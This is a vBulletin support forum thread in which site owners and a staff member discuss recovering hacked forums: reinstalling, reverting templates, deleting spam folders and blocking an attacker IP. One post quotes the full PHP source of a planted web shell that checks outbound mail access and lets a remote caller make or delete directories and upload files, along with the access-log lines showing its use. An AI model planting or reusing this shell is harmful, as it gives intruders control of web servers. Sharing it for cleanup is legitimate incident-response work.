-
I had this too - clean install back in July 2011... users were getting alerts on ver 4.1.11. -
It looks like my forums are clean now. I was running VBulletin 4.0.8. I upgraded with a clean install to VBulletin 4.1.9. The clean install insured that any compromised VBulletin source files were removed. During the install, once you're in the AdminCP, all of the modified templates are identified and you're given the option to revert them, which I did. This insured that any compromised templates were corrected. I gather the vulnerability that existed in some versions, like 4.0.8, has been corrected by (or even before) the latest version 4.1.9, so I'm hopeful that this is behind me now. Google has reviewed my forums and detected no malware.
I've added an .htaccess file in my root directory to block the IP identified in the earlier post by Wayne. I think having just the one .htaccess file in the root directory may be best. If any .htaccess files appear in sub-directories then I'll know just by their prescence that they are bogus and should be deleted.
I changed my FTP and VBulletin Admin passwords. I don't think these were compromised, but just to be careful.
Many thanks to Wayne for the excellent and timely support.Leave a comment:
-
I'd recommend not running the main site under HTTPS. If you do then make sure all your settings point to the SSL version.
For security, just the Admin CP and it doesn't have the reliance on AJAX and Javascript that main site does so it will work better.Leave a comment:
-
I modified the .htaccess file in the main directory to have the entire site run under ssl. I'm accepting the 'security warning', but all I get is a blank page. The new thread never posts. I can, however, reply to posts. It's just hard to pinpoint what the problem might be since I've done several things over the past few weeks to get rid of the virus and prevent my site from getting another one. Do you have any recommended actions to fix this? Any maintenance I can do on the board? Should I try re-instaling 4.19? Thanks,
FrankLeave a comment:
-
That is a browser security warning. So you would have to accept that in order to post. If you're going to run under SSL, you should make sure your entire forums run under SSL.Originally posted by ramf02 View PostLeave a comment:
-
Ok so I've opened up the board again and I can't seem to be able to post new threads. I can reply, though. My forum is here: https://www.richardbey.org/forums. When submitting the form to post a new thread i get this now: Although this page is encrypted, the information you have entered is to be sent over an unencrypted connection and could easily be read by a third party.
Is it not posting because it's going through the SSL now? Thoughts? Thanks,
FrankLeave a comment:
-
Like I said, the contents of that folder are to install the default data that comes with the CMS. If all you had was the forum, I am not sure why you have those files.Leave a comment:
-
Ok I'm deleting both of those folders. The file names in the cmsdefaultdata just seemed too odd -- like they were ads for something. I'm curious, though, what do you mean install/upgrade the publishing suite? All I have ever had was the vbulletin message board.Originally posted by Wayne Luke View PostLeave a comment:
-
ok thanks. the names of those html files seemed strange/foreign sounding to me, so i figured i'd ask.Leave a comment:
-
Like I said, the jsonwrapper folder isn't a valid folder in 4.1.9 so you can probably delete. Don't know if it is was added by an addon though.
The cmsdefaultdata folder contains the information that is optionally imported when you install/upgrade the Publishing Suite. If you delete it, it won't hurt anything but it is a valid folder.Leave a comment:
-
So what should I do about the jsonwrapper directory? Delete it?
How about the cmsdefaultdata folder? I did some digging in it and it has a ton of files. It has a subdirectory with my admin name and files such as jimm-na-russkom.html, jimm-nastroyka-nokia-6233.html, and aska-na-telefon-samsung-gt-s5230.html. What the heck are these? Parts of the virus?? Most of the files in the cmsdefaultdata folder have the same dates as the files I deleted from earlier which leads me to believe they're part of the virus. There's also a ton of .jpgs and.pngs in the attachments subdirectory (same date as previously cleared out files) with names of 37236-37647. If these are still part of the virus then why didn't the file scanner find these? Is it because they're in directories that vbulletin isn't even looking for?
Thanks,
FrankLeave a comment:
-
Most likely your source of infection and why we recommend customers keep their software up to date.Originally posted by mmavipc View PostLeave a comment:
-
There is no directory jsonwrapper in vBulletin. The /includes/facebook/ directory is valid though.Originally posted by ramf02 View Post
Most directories include an index.html file. These are 0 byte empty files and put there just in case a web server has file indexing turned on for some reason. They prevent lookie-loos from seeing the contents of the individual directories.Leave a comment:
-
This happened on my 4.1.9 board, the only file that the checker found without default contents was class_core.php which I modified for cloudflare.
File found: edw.php
contents
Here's the log of it being createdCode:<?php function LoadExtension($ext) { $lib = $ext.'.so'; if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $lib = 'php_'.$ext.'.dll'; if(!extension_loaded($ext)) { if(!dl($lib)) return FALSE; } return TRUE; } function Check25Port() { $res = TRUE; $s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if(@socket_connect($s, 'mxs.mail.ru', 25) == FALSE) $res = FALSE; socket_close($s); return $res; } function Check() { // Version >= 4.1.0 if(strnatcmp(phpversion(), '4.1.0') < 0) return FALSE; // Check for safe mode //if(ini_get('safe_mode')) // return FALSE; // Check 'sockets' ext if(!LoadExtension('sockets')) return FALSE; // Check 25 port if(!Check25Port()) return FALSE; return TRUE; } function RemoveDir($dir) { $res = FALSE; if(is_dir($dir)) { $objects = scandir($dir); foreach($objects as $object) { if($object != "." && $object != "..") { if(filetype($dir."/".$object) == "dir") RemoveDir($dir."/".$object); else unlink($dir."/".$object); } } reset($objects); $res = rmdir($dir); } return $res; } function Upload($dir) { $res = move_uploaded_file($_FILES["file"]["tmp_name"], $dir.'/'.$_FILES["file"]["name"]); return $res; } function Work() { $type = $_POST['type']; $res = FALSE; echo('EDW'); if($type == 'check') { $res = Check(); } else if($type == 'mkdir') { $dir = $_POST['dir']; $res = mkdir($dir); } else if($type == 'rmdir') { $dir = $_POST['dir']; $res = RemoveDir($dir); } else if($type == 'upload') { $dir = $_POST['dir']; $res = Upload($dir); } if($res) echo('OK'); else echo('FAILED'); } Work(); ?>
178.16.22.59 - - [08/Dec/2011:02:27:26 -0700] "POST /forum/commons.php HTTP/1.1" 200 89892 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
178.16.22.59 - - [08/Dec/2011:02:27:43 -0700] "POST /forum/commons.php HTTP/1.1" 200 10162 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
178.16.22.59 - - [08/Dec/2011:02:27:44 -0700] "POST /forum/edw.php HTTP/1.1" 200 335 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
I was running an old VB version back then.Last edited by mmavipc; Thu 5 Jan '12, 11:34pm.Leave a comment:
-
Has anyone noticed this trend in google webmaster tools? Page loading speed is a factor in search result rankings, so this can't be good?...Wed 22 Aug '18, 5:49pm
Leave a comment: